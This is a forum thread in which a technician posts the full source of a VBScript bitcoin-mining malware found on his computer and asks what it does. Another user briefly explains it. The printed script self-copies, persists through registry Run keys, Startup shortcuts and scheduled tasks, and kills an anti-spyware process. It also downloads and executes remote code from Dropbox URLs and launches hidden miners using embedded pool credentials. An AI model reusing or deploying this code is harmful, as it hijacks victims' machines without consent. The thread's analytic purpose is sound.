Suspicious vbs - could someone translate?

[brijem]

As of this morning, each time I start my computer I am prompted to run a vbs called "winlogin" . . . it seems to be an attempt on someone's behalf to use my computer's processing power to make money through something called "bitcoin". I'm a technician (have been for 17 years) and I will eventually remove the script, but while it's still on the computer (though inactive) I am wondering if anyone could tell me what exactly it is trying to achieve and how - I'm very curious about what exactly the script means - I am not a programmer - I have been able to get the gist of it by looking at the code, but am unsure about the finer details. If you're so inclined, could you have a look and tell me what this vbs is hoping to do and how it hopes to do it. Thanks!

Here's the code:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
'0.5.2
sub dl(strFileURL, strHDLocation)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then
objFSO.DeleteFile strHDLocation
end if
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub

sub dlEval(strFileURL)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Execute(objXMLHTTP.ResponseText)
if (objXMLHTTP.ResponseText = "call Uninstall()") then
wscript.quit
end if
Set objXMLHTTP = Nothing

End if
end sub

sub ex(path)
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create path, null, objConfig, intProcessID
end sub

function countProcess(name)
set service = GetObject ("winmgmts:")
counter = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = name then
counter = counter+1
End If
next
countProcess = counter
end Function

Function checkIfRunning(quit)
counter = countProcess("wscript.exe")
if counter > 1 then
checkIfRunning = true
if (quit = true) then
wscript.quit
end if
exit function
end if
checkIfRunning = false
end function

Function getEnv(variableName)
Set wshShell = CreateObject( "WScript.Shell" )
result = wshShell.ExpandEnvironmentStrings( "%" & variableName & "%" )
if (result <> "%" & variableName & "%") then
getEnv = result
exit Function
end if
getEnv = false
end Function

function findTmpDir()
tmp = getEnv("TEMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
tmp = getEnv("TMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
findTmpDir = false
end Function

sub verifyRegistryKey(key, val)
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.RegWrite key, val, "REG_SZ"
Set oShell = Nothing
end sub

function getAutostartPath()
Set oShell = WScript.CreateObject("WScript.Shell")
path = oShell.SpecialFolders("Startup")
Set oShell = Nothing
path=path & "\Windows Login Script.lnk"
getAutostartPath = path
end function

sub verifyAutostart(path)
aPath = getAutostartPath()
if (aPath <> false) then
Set oShell = WScript.CreateObject("WScript.Shell")
set lnk = oShell.CreateShortcut(aPath)
lnk.TargetPath = path
lnk.save
set oShell = Nothing
end if
end sub

function getTmpPath()
tmp = findTmpDir()
if (tmp <> false) then
tmp = tmp & "\winlogin.vbs"
end if
getTmpPath = tmp
end function

function getUserProfilePath()
up = getEnv("USERPROFILE")
if (up <> false) then
up = up & "\winlogin.vbs"
end if
getUserProfilePath = up
end function

sub copySelf
Set oFSO = CreateObject("Scripting.FileSystemObject")
tmp = getTmpPath
if (tmp <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, tmp, true)
end if
up = getUserProfilePath()
if (up <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, up, true)
end if
set oFSO = Nothing
end sub

sub Uninstall()
'FIXME: [Future] Uninstall procedure
end sub

sub Update()
'FIXME: [Future] Update procedure
end sub

Function tryToKillProcess(name)
set objWMIService = GETOBJECT("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set colProcess = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & name & "'")
count = 0
for each objProcess in colProcess
objProcess.Terminate()
count = count + 1
next
tryToKillProcess = count
end Function

sub addScheduledTask()
cmd = getUserProfilePath()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colOperatingSystem = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystem
ServicePack = objOperatingSystem.ServicePackMajorVersion
Version = objOperatingSystem.Version
Next
IF Mid(Version,1,3) = "5.1" Then
xp = true
else
xp = false
end if
if (fileExists("schtasks.exe") = true and xp = false) then
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
else
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colScheduledJobs = objWMIService.ExecQuery("Select * from Win32_ScheduledJob")
Needed = true
For Each objJob in colScheduledJobs
if InStr(LCase(objJob.Command), "winlogin.vbs") then
Needed = false
end if
next
if Needed = true then
Set objNewJob = objWMIService.Get("Win32_ScheduledJob")
for i=0 to 23
if (len(i) < 2) then
strTime = "********0" & i & "1000.000000-000"
else
strTime = "********" & i & "1000.000000-000"
end if
errJobCreated = objNewJob.Create ("wscript.exe """ & cmd & """", strTime, True , 127, , , JobID)
next
end if
end if
end sub

sub infect()
call copySelf
skipRegistryInfection = false
if (countProcess("TeaTimer.exe") > 0) then
tryToKillProcess("TeaTimer.exe")
if (countProcess("TeaTimer.exe") > 0) then
skipRegistryInfection = true
end if
end if
if (skipRegistryInfection = false) then
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
Err.Clear()
On Error Resume Next
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
if (Err.Number <> 0) then
admin = false
else
admin = true
end if
'FIXME: [Future] for USB spreading
'call verifyRegistryKey("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutor un", 0)
end if
call verifyAutoStart(getUserProfilePath())
call addScheduledTask()
end sub

Function getMinerPath(miner)
tmp = findTmpDir()
getMinerPath = false
if (tmp <> false) then
Select case miner
Case "gpu"
minerName = "\cgm\msdc.exe"
Case "cpu"
minerName = "\rpcm\svehost.exe"
end select
getMinerPath = tmp & minerName
end if
end Function

function fileExists(theDLL)
sysPath = getEnv("PATH")
arSysPath = Split(sysPath, ";")
Set objFSO = Createobject("Scripting.FileSystemObject")
fileExists = false
for each path in arSysPath
If objFSO.Fileexists(path & "\" & theDLL) Then
fileExists = true
exit for
end if
next
Set objFSO = Nothing
End Function

sub getRequiredPackages()
cgm = getMinerPath("gpu")
rpcm = getMinerPath("cpu")
if (cgm <> false and rpcm <> false) then
Set objFSO = Createobject("Scripting.FileSystemObject")
needed = false
If not objFSO.Fileexists(cgm) or not objFSO.Fileexists(rpcm) Then
needed = true
end if
if (needed = true) then
tmp = findTmpDir()
tmpPath = tmp & "\arc.exe"
'FIXME: CHANGE ADDRESS!
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call ex(tmpPath & " x -o" & tmp & " -y")
end if
end if
end sub

Function verifyPayloadRunning()
verifyPayloadRunning = false
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
if (cgCount + rpcCount > 0) then
verifyPayloadRunning = true
end if
end Function

sub startGPUMining()
cgm = getMinerPath("gpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & cgm & " -o api.bitcoin.cz:8332 -O hallmining.worker1:7d9LwsMG --no-pool-disable -I -2")
end sub

sub startCPUMining()
threads = getEnv("NUMBER_OF_PROCESSORS")
if threads = false then
threads = 1
else
if (threads > 1) then
threads = int(threads/2)
end if
end if
rpcm = getMinerPath("cpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & rpcm & " -url=http://api.bitcoin.cz:8332 -threads=" & threads & " -user=hallmining.worker1 -password=7d9LwsMG")
end sub

sub payload()
running = verifyPayloadRunning()
if (running = false) then
call getRequiredPackages()
tmp = findTmpDir()
if (tmp <> false) then
if (fileExists("openCL.dll") = true) then
call startGPUMining()
wscript.sleep(10000)
if (verifyPayloadRunning() = false) then
call startCPUMining()
end if
else
call startCPUMining()
end if
end if
end if
end sub

'TODO: scramble code

On Error Resume Next
call infect()
call checkIfRunning(true)
'FIXME: CHANGE ADDRESS!
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
call payload()

[MarkT]

In short, to me it looks like the script is trying to create/overwrite winlogin.vbs with code to download and execute a script from "https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" This is then run at startup and as a scheduled task. I see nothing good in the code you posted.

[brijem]

Thanks Mark . . . as a tech, sometimes I wish I knew more about programming, it would be helpful in certain situations. I was able to get the general sense of what this person is trying to accomplish, but I didn't notice that it was set to run as a task. Very helpful! Thank you : )

[Hackoo]

I am trying to develop an application in HTA "Process Checker.hta" to check online on Fichier.net, ProcessLibrary and Google the various processes running on a PC.
So the purpose of this application is to Check out whether the process is a malware or a normal process that belongs to the system.
So you can display the executable file that is associated with this process in the explorer.
and you can also kill the process or even all instances of this process.
This program was tested on Windows XP SP2 and it is in Beta and is under development, so if you encounter any bug in Windows 7 or Vista, please don't blame me
NB : it's a French Version and if there are some members volunteers here would like to translate it in English it would be nicer